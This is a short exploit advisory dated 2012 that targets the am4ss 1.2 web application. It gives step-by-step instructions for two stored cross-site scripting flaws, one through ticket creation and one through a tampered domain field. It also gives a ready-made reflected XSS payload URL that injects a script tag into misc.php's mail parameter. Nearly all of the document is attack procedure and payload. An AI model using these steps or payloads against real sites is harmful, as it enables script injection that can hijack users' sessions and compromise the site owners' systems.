###########################################
# Exploit Title : am4ss 1.2 <= Multiple Vulnerabilities
# Author : s3n4t00r
# Home : Sec-w.com
# Version : all version
# Date : Jul 31, 2012
############################################
XSS Stored [1]
1- Register
2 - Login here [ http://localhost/am4ss/orderdev.php?step=2 ]
3- Create Ticket and add your code html or js
4- Show Tickets [ http://localhost/exp/am4ss/tickets.php ]
XSS Stored [2]
1- Register
2 - Login here [ http://localhost/am4ss/hosting.php?do=order&planid=1&step=6 ]
3- Create Ticket and Change data [ domaine ] using Tamper Data
4- Show Tickets [ http://localhost/exp/am4ss/tickets.php ]
XSS reflected [1]
here : [ http://localhost/exp/am4ss/misc.php?do=deletemail&mail=(XSS) ]
Example http://localhost/exp/am4ss/misc.php?do=deletemail&mail="><script>alert('Sec-w.com')</script>
=================================================
Gr34ts 4 : Sec-w.com Members